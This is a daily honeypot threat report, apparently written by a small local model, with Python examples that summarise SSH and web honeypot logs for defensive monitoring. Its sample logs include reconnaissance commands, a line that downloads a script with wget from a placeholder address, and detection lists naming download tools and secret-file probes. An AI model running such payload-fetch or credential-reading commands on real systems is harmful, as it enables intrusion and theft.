💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 29, 2026

Critical threat level: high-volume automated attack activity across the SSH, web and canarytoken services.

Tags: ssh-brute-force, honeypot, web-scanning, multi-protocol, high-severity, threat-intelligence

Threat Landscape Overview

Today’s SSH honeypot recorded 1,774 login attempts, of which 1,343 succeeded. On a medium-interaction honeypot a “successful” login is expected: the service accepts credentials by design so that post-login behaviour can be captured, so the success count measures attacker volume, not a defensive failure. What stands out is how little followed the logins: only 56 unique commands were executed across the whole day, so the large majority of sessions were automated credential checks that disconnected without doing anything. That profile points to mass scanning rather than targeted intrusion.

Geographic Analysis

Attacks originated from many countries. The top ten sources, with each country’s share of the day’s total, were:

  • United States: 38 (21%) - the largest single source.
  • France: 20 (11%)
  • Belgium: 19 (10%)
  • China: 17 (9%)
  • Unknown: 15 (8%) - addresses with no geolocation record.
  • Germany: 13 (7%)
  • Vietnam: 7 (3%)
  • Russian Federation: 6 (3%)
  • Netherlands: 6 (3%)
  • United Kingdom: 4 (2%) - the smallest count in the top ten.

The listed counts sum to 145 while the percentages are computed against the full set of sources, so roughly a fifth of the day’s sources fall outside the top ten. Geolocation is by source IP, so it reflects where the attacking infrastructure (VPS providers, compromised hosts, proxies) sits, not where the operators are. The country mix is useful for spotting day-to-day shifts, not for attribution.

SSH Brute Force Analysis

Credential attempts relied on well-known defaults such as “admin” and “123456”, the standard dictionary used by mass SSH scanners. The honeypot accepts these on purpose (that is how it records post-login activity), so the 1,343 successes say nothing about defensive strength; on a production host the same attempts are stopped by disabling password authentication and allowing key-based logins only.

Post-Exploitation Behavior

33 TTY sessions were recorded, and they show a consistent pattern:

  • Logins: the 1,343 accepted logins came from far fewer source addresses that retried repeatedly. The honeypot applies no lockout, so repeated attempts from one IP are expected and are themselves a useful signal of automation.
  • Commands executed:
    • whoami and cat /etc/passwd
    • Both are basic reconnaissance (identify the current user, enumerate accounts). No privilege escalation, persistence mechanism or payload download was observed in the TTY sessions.

The practical takeaway for production hosts is the usual one: no password authentication on SSH, key-based logins only, and audit logging of interactive sessions so that reconnaissance commands like these are visible when they do occur.
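The metrics quoted in the overview, brute-force and post-exploitation sections above (total and successful logins, unique commands, sessions that actually ran something, top passwords, country share) can be computed directly from the honeypot’s event log. The following is an added example, not code from this lab or from any honeypot project; it assumes a Cowrie-style JSON event log (the page does not name the honeypot software), uses a constructed sample log and a constructed GeoIP lookup, and derives the failed-login count from total minus successful so the three numbers cannot disagree:

```python
import json
from collections import Counter

# Constructed sample log in Cowrie-style JSON lines. Assumption: the page does not
# name its SSH honeypot; the eventid values and field names used here follow
# Cowrie's JSON log format. IPs are from documentation ranges.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.10"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.10","username":"root","password":"password"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.10","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"whoami"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"cat /etc/passwd"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"198.51.100.7"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.7","username":"admin","password":"admin"}
{"eventid":"cowrie.login.success","session":"b2","src_ip":"198.51.100.7","username":"admin","password":"123456"}
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"203.0.113.10"}
{"eventid":"cowrie.login.success","session":"c3","src_ip":"203.0.113.10","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"203.0.113.10","input":"whoami"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"203.0.113.10","input":"cd /tmp; wget http://203.0.113.99/x.sh"}
not json, should be skipped
"""

# Constructed stand-in for a GeoIP lookup (assumption; a real report would use
# a MaxMind-style database keyed on src_ip).
GEOIP = {"203.0.113.10": "United States", "198.51.100.7": "France"}

# Substrings that indicate an attempt to pull a payload onto the box.
DOWNLOAD_MARKERS = ("wget ", "curl ", "tftp ", "ftpget ")

LOGIN_EVENTS = ("cowrie.login.success", "cowrie.login.failed")


def parse_events(text):
    """Parse one JSON object per line; blank and malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarize(events, geoip):
    """Headline metrics for a daily SSH honeypot report.

    Failed logins are derived as total minus successful so the three numbers
    can never disagree, and country shares are computed over the same set of
    unique source IPs that the per-country counts come from.
    """
    logins = [e for e in events if e.get("eventid") in LOGIN_EVENTS]
    successes = [e for e in logins if e["eventid"] == "cowrie.login.success"]
    commands = [e for e in events if e.get("eventid") == "cowrie.command.input"]
    sessions = {e["session"] for e in events if e.get("eventid") == "cowrie.session.connect"}
    sessions_with_commands = {e["session"] for e in commands}
    src_ips = {e["src_ip"] for e in events if "src_ip" in e}

    countries = Counter(geoip.get(ip, "Unknown") for ip in src_ips)
    total_ips = len(src_ips) or 1  # avoid division by zero on an empty day
    by_country = [
        (country, n, round(100.0 * n / total_ips, 1))
        for country, n in countries.most_common()
    ]

    return {
        "total_logins": len(logins),
        "successful": len(successes),
        "failed": len(logins) - len(successes),
        "unique_src_ips": len(src_ips),
        "sessions": len(sessions),
        "sessions_with_commands": len(sessions_with_commands),
        "unique_commands": len({e["input"] for e in commands}),
        "top_passwords": Counter(e["password"] for e in logins).most_common(3),
        "download_attempts": sum(
            1 for e in commands if any(m in e["input"] for m in DOWNLOAD_MARKERS)
        ),
        "by_country": by_country,
    }


if __name__ == "__main__":
    for key, value in summarize(parse_events(SAMPLE_LOG), GEOIP).items():
        print(f"{key}: {value}")
```

Two design points: sessions are counted from connect events, not from logins, so a session that authenticates and immediately drops still counts as a session with zero commands (which is exactly the “lots of logins, few commands” pattern described above), and the download marker scan gives the malware section its “attempts” number even on days when no file was actually captured.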

Web Scanner Activity

The HTTP honeypot logged requests for “/SDK/webLanguage”, “/”, “/favicon.ico”, “/zc?action=getInfo” and “/.well-known/security.txt”. These are mostly fingerprinting and mass-scan probes rather than targeted attacks. “/” and “/favicon.ico” identify the server and the web application behind it (favicon hashes are a standard fingerprinting signal), “/.well-known/security.txt” is the RFC 9116 security-contact file and is fetched by researchers and crawlers as much as by attackers, and “/SDK/webLanguage” is the endpoint used in exploit attempts against Hikvision IP cameras (CVE-2021-36260), which suggests a scanner sweeping address ranges for cameras rather than anything aimed at this host. The spread of distinct source IPs is consistent with broad, untargeted scanning.
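Turning the path list above into something actionable means bucketing each request by what the scanner is looking for and counting distinct sources per bucket, so that a new or unexplained path stands out. This is an added example, not the lab’s own tooling; it assumes Common Log Format lines (the page does not say how the web honeypot logs), uses constructed sample lines with documentation IPs, and goes slightly beyond the page’s path list by adding a rule for secret-file probes such as /.env:

```python
import re
from collections import Counter, defaultdict

# Constructed access-log lines in Common Log Format (assumption: the page does not
# say how its web honeypot logs; IPs are documentation addresses).
ACCESS_LOG = """\
203.0.113.10 - - [29/May/2026:10:00:01 +0000] "PUT /SDK/webLanguage HTTP/1.1" 404 0
203.0.113.10 - - [29/May/2026:10:00:02 +0000] "GET / HTTP/1.1" 200 612
198.51.100.7 - - [29/May/2026:10:05:00 +0000] "GET /favicon.ico HTTP/1.1" 404 0
198.51.100.7 - - [29/May/2026:10:05:01 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0
192.0.2.44 - - [29/May/2026:11:12:09 +0000] "GET /zc?action=getInfo HTTP/1.1" 404 0
192.0.2.44 - - [29/May/2026:11:12:10 +0000] "GET /.env HTTP/1.1" 404 0
192.0.2.45 - - [29/May/2026:11:20:00 +0000] "PUT /SDK/webLanguage HTTP/1.1" 404 0
this line is not a log entry and is skipped
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Ordered rules: first match wins. Paths are compared without their query string.
RULES = [
    # Endpoint used by Hikvision CVE-2021-36260 exploit scanners.
    ("camera_exploit_probe", lambda method, path: path == "/SDK/webLanguage"),
    # Not on the page's list; added to show how unrelated secret-file probes are grouped.
    ("secret_file_probe", lambda method, path: path in ("/.env", "/.git/config", "/.aws/credentials")),
    ("favicon_fingerprint", lambda method, path: path == "/favicon.ico"),
    ("security_txt_lookup", lambda method, path: path == "/.well-known/security.txt"),
    ("root_probe", lambda method, path: path == "/"),
]


def classify(method, path):
    """Return the first matching rule name, or 'uncategorized' for triage."""
    bare = path.split("?", 1)[0]
    for name, rule in RULES:
        if rule(method, bare):
            return name
    return "uncategorized"


def analyze(text):
    """Requests and distinct source IPs per category, plus paths needing triage."""
    per_category = defaultdict(lambda: {"requests": 0, "ips": set()})
    uncategorized_paths = Counter()
    parsed = 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort the whole report
        parsed += 1
        category = classify(m["method"], m["path"])
        per_category[category]["requests"] += 1
        per_category[category]["ips"].add(m["ip"])
        if category == "uncategorized":
            uncategorized_paths[m["path"]] += 1
    categories = {
        name: {"requests": v["requests"], "unique_ips": len(v["ips"])}
        for name, v in per_category.items()
    }
    return {"parsed": parsed, "categories": categories, "uncategorized_paths": uncategorized_paths}


if __name__ == "__main__":
    result = analyze(ACCESS_LOG)
    for name, stats in sorted(result["categories"].items()):
        print(f"{name:22} requests={stats['requests']} unique_ips={stats['unique_ips']}")
    print("needs triage:", dict(result["uncategorized_paths"]))
```

The uncategorized bucket is the useful output: in the sample it surfaces “/zc?action=getInfo”, which the page lists without attribution, as the one path that still needs a human to decide what it is hunting for.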

Malware Captures

No malware was captured through the SSH honeypot today: none of the recorded sessions fetched a payload that the honeypot could save. A honeypot captures rather than blocks, so this is an absence of download attempts in the sessions that reached a shell, not a defensive success.

SSH Tarpit (Endlessh)

No Endlessh tarpit data was recorded today. That means the tarpit port logged no connections (or the log was not collected), not that attackers evaded it. An empty tarpit log supports no conclusion beyond confirming that the service is up and its logging is wired into the report.

Canarytoken Alerts

Sixty-seven canarytoken triggers were recorded. These fire when someone uses the decoy AWS credentials planted in the honeypot’s filesystem, so each trigger means an attacker harvested the fake keys from the honeypot and tried them against AWS. The variety of tokens hit shows that credential files are routinely collected from compromised hosts and tested automatically; on a real system the same behaviour would mean live keys being exercised soon after compromise. Decoy credentials with alerting are cheap, high-signal detections and belong on production hosts as much as on honeypots.

Community Defense

The attacking IPs were reported to AbuseIPDB, AlienVault OTX, Blocklist.de and SANS DShield, where other defenders can use them for blocking and scoring. Hashes of captured samples are submitted to VirusTotal when there are any, so other defenders can check their own detections against them; none were captured today.

Conclusion

The SSH honeypot remains a useful sensor. Today’s activity was high in volume but shallow: credential spraying with default passwords, light reconnaissance after login, opportunistic web scanning and automated use of stolen decoy credentials. Those are the patterns to tune detections against on real systems. Stay tuned for the next report.


This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.